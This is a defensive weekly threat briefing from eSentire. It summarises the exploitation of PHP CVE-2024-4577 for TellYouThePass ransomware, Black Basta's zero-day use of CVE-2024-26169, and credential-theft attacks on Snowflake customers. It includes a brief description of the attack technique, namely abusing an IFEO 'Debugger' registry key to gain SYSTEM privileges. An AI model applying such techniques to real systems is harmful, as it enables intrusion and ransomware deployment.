eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Recent Threat Intelligence Advisories
Noteworthy News
PHP Vulnerability Leveraged by Attackers to Distribute TellYouThePass Ransomware
Bottom Line: A critical Remote Code Execution vulnerability in PHP is being actively exploited to deliver ransomware. As exploitation is ongoing, it is critical that organizations immediately apply the relevant security patches to minimize the likelihood of impact.
On June 6th, DEVCORE disclosed a critical vulnerability in PHP on the Windows operating system. The vulnerability, tracked as CVE-2024-4577 (CVSS: 9.8), is a Remote Code Execution (RCE) vulnerability. Exploitation would allow a remote and unauthenticated threat actor to reveal the source code of scripts and run arbitrary code on vulnerable servers. CVE-2024-4577 stems from the “Best-Fit” feature used within the Windows operating system. The Best-Fit feature allows the replacement of characters in a command line; this may be abused by threat actors to pass options to the PHP binary being run, leading to malicious outcomes.
Only one day later, on June 7th, watchTowr released a technical analysis of the vulnerability as well as Proof-of-Concept (PoC) exploit code. Both Imperva and The Shadowserver Foundation observed exploitation attempts beginning the same day.
On June 10th, Imperva Threat Research reported, that CVE-2024-4577 is being leveraged by threat actors to deliver TellYouThePass ransomware. The attackers exploited the vulnerability to execute arbitrary PHP code, using the "system" function they ran an HTML application file hosted on an attacker- controlled web server via mshta.exe, a native Windows binary. The file contained a VBScript, which in turn resulted in the deployment of a .NET variant of TellYouThePass ransomware.
eSentire Threat Intelligence Analysis:
The rapid weaponization of CVE-2024-4577 showcases the efficiency of threat actors in exploiting new vulnerabilities. In this case, a security research company developed and published PoC exploit code. The availability of this PoC exploit code significantly lowers the barrier for less skilled threat actors to weaponize the vulnerability. This quick transition from vulnerability disclosure to active exploitation demonstrates the sophisticated coordination and readiness of attackers.
The TellYouThePass ransomware group is not sophisticated, but they have a track record of rapidly adopting public exploits for new vulnerabilities to enable victim compromise; past examples include CVE-2021-44228 (Log4j) and CVE 2023-46604. This demonstrates how threat actors exploit widely publicized vulnerabilities to maximize impact.
Such swift weaponization poses significant risks, emphasizing the necessity for organizations to adopt proactive patch management and immediate implementation of security updates to mitigate potential breaches.
eSentire’s Threat Response Unit (TRU) has taken proactive measures to address the threat posed by CVE-2024-4577. The Tactical Threat Response (TTR) team has developed new detections within eSentire MDR for Network to identify and respond to exploitation attempts. Additionally, eSentire’s Managed Vulnerability Service (MVS) includes plugins specifically designed to identify this vulnerability. eSentire’s Threat Intelligence team conducted threat hunts across the entire eSentire client base to uncover any signs of exploitation. Furthermore, IP addresses associated with real-world attacks are blocked through the eSentire Global Block list, enhancing the security posture for all clients.
Black Basta Ransomware Gang Linked to Windows Zero-Day Attacks
Bottom Line: The Black Basta ransomware gang has been exploiting a high-severity zero-day vulnerability in Windows potentially months prior to patching.
On June 12th, Symantec released a report on the Black Basta ransomware group, operated by the Cardinal cybercrime group (aka Storm-1811, UNC4393), exploiting a high-severity zero-day vulnerability in Windows. The flaw tracked as CVE-2024-26169 (CVSS: 7.8), is a privilege escalation vulnerability in the Windows Error Reporting Service. The vulnerability allows attackers to gain SYSTEM-level privileges through a null security descriptor in werkernel.sys, enabling registry modifications.
The attacks are believed to be linked to Black Basta due to the use of batch scripts that masqueraded as software updates designed to run malicious commands and establish persistence on compromised systems, a commonly used tactic for the group. In the report they investigated an attempted ransomware attack where an exploit tool for CVE-2024-26169 was deployed.
The report suggests the vulnerability was exploited by the group months prior to Microsoft's patch in March 2024. Symantec highlights two variants of a tool used in the attacks; the earliest compilation timestamp of a tool utilizing the exploit was December 18th, 2023. This activity was following an initial infection by DarkGate malware, which is known to be used by Black Basta after the takedown of Qakbot.
The tool exploited the fact that the Windows file werkernel.sys uses a null security descriptor when creating registry keys. The tool then leverages this to create a registry key (HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe) and sets the "Debugger" value to its own executable pathname which allows it to launch a shell with SYSTEM privileges.
eSentire Threat Intelligence Analysis:
The Black Basta campaign exploiting CVE-2024-26169 represents a significant threat, underscoring the importance of staying ahead of potential vulnerabilities and maintaining robust cybersecurity defenses. Organizations must prioritize updates, monitor for anomalies, and have effective response strategies to mitigate the impact of such advanced threats.
While the identification of a compilation timestamp from months prior to patch release is notable, timestamp values are not definitive proof that an exploit was used as a zero-day as they can be modified. However, in this instance, it seems unlikely that the attackers had any reason to backdate the timestamp, suggesting the exploit was indeed used before a patch was available. This indicates a high likelihood that the vulnerability was actively leveraged as a zero-day by the Black Basta group.
As the vulnerability was patched in Microsoft’s March 2024 Patch Tuesday, it is highly recommended that organizations not currently up-to-date apply patches immediately. Deploying endpoint agents can provide additional defense mechanisms to prevent possible ransomware deployment in the case of a zero-day vulnerability being exploited.
UNC5537 Targets Snowflake Customer Instances
Bottom Line: Customers of cloud-based data warehouse platform Snowflake were the target of data extortion attacks in April and May 2024. As organizations increasingly migrate to cloud environments, Software-as-a-Service (SaaS) products are becoming prime targets for cyber threats.
On June 2nd, Snowflake, alongside CrowdStrike and Mandiant, issued a joint statement on an ongoing investigation into a targeted threat campaign against some Snowflake customer accounts. Key findings include:
- No evidence of vulnerabilities or breaches in Snowflake’s platform
- No evidence of compromised credentials of Snowflake personnel
- The campaign targets users with Single-Factor Authentication (SFA)
- Threat actors used credentials obtained through information stealing malware
- A former employee’s demo account, lacking MFA, was accessed but did not contain sensitive data
On June 10th, Mandiant (Google) released a detailed report on a financially motivated threat actors targeting Snowflake database customers since at least April 2024. The group, tracked as UNC5537, leverages stolen credentials to gain unauthorized access to Snowflake instances, leading to extensive data theft and extortion attempts. This campaign has compromised hundreds of Snowflake customer accounts, exfiltrating sensitive data and attempting to extort victims or sell the data on cybercrime forums.
UNC5537 primarily uses credentials obtained via infostealer malware, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and META. Many of these credentials were stolen as far back as 2020 from devices used for both personal and professional activities. The attackers utilize various tools to access Snowflake instances, including Snowflake's web-based UI, command-line tool SnowSQL, and a custom reconnaissance utility named "rapeflake" (Frostbite). They often exploit environments without MFA and those using outdated or previously compromised credentials. Once access is obtained, UNC5537 executes SQL commands to stage and transfer data. The group uses VPN services and VPS systems alongside commercial cloud storage services to access victim instances and store stolen data.
eSentire Threat Intelligence Analysis:
Due to the increasing use of SaaS platforms, organizations expose themselves to new vulnerabilities and attack paths. The products often store vast amounts of sensitive data and are integral to business operations, offering a lucrative target for financially motivated threat actors.
On June 13th, Mandiant released a report on a separate financially motivated threat actor targeting SaaS applications. This report sheds light on a broader trend of threat actors targeting SaaS applications and cloud environments. UNC3944 (aka. 0ktapus, Octo Tempest, Scatter Swine, and Scattered Spider) has been actively compromising user credentials through social engineering techniques such as SMS phishing, SIM swapping, and MFA fatigue to gain unauthorized access to various SaaS platforms like Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure.
Both UNC5537 and UNC3944 rely heavily on stolen credentials to gain initial access. UNC3944 employs social engineering tactics to steal credentials from mobile devices and administrative accounts, while UNC5537 uses credentials obtained from infostealer malware. Monitoring dark web marketplaces allows organizations to identify breaches and stolen credentials before threat actors steal data or perform other malicious actions. Dark Web Monitoring services can greatly assist organizations in identifying and responding to similar attacks.
The Snowflake incident underscored the risks of Single-Factor Authentication (SFA). Similarly, UNC3944's campaigns exploit environments where MFA is not enforced or where alternative MFA methods can be manipulated, allowing easier access to critical systems. This highlights the importance of the use of token-based MFA to prevent possible breaches if login credentials are compromised.
In some cases, the compromised corporate devices were being misused by employees for gaming and downloading pirated software. Using corporate devices for personal activities adds additional risk and should be avoided. Similarly, unless explicitly allowed, personal devices should not be used for work related tasks, as unmonitored devices may lead to the loss of sensitive data including credentials.
UNC3944 employs native cloud tools and functionalities to maintain persistence and evade detection, such as leveraging Azure's serial console and various administrative tools. This approach is akin to UNC5537's use of Snowflake's built-in features for data exfiltration. Both campaigns highlight vulnerabilities in cloud and SaaS security practices, particularly around Identity and Access Management (IAM). The use of legitimate tools and credentials makes detection challenging, emphasizing the need for comprehensive security strategies that include advanced threat detection and response capabilities such as a focus on detecting lateral movement and privilege escalation activities within cloud environments.
The Snowflake incident and the broader targeting of SaaS applications illustrates the evolving nature of cyber threats against cloud services. By understanding the tactics used by these threat actors and implementing robust security measures, organizations can better protect their sensitive data and maintain the integrity of their cloud environments.
About the threat briefings:
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
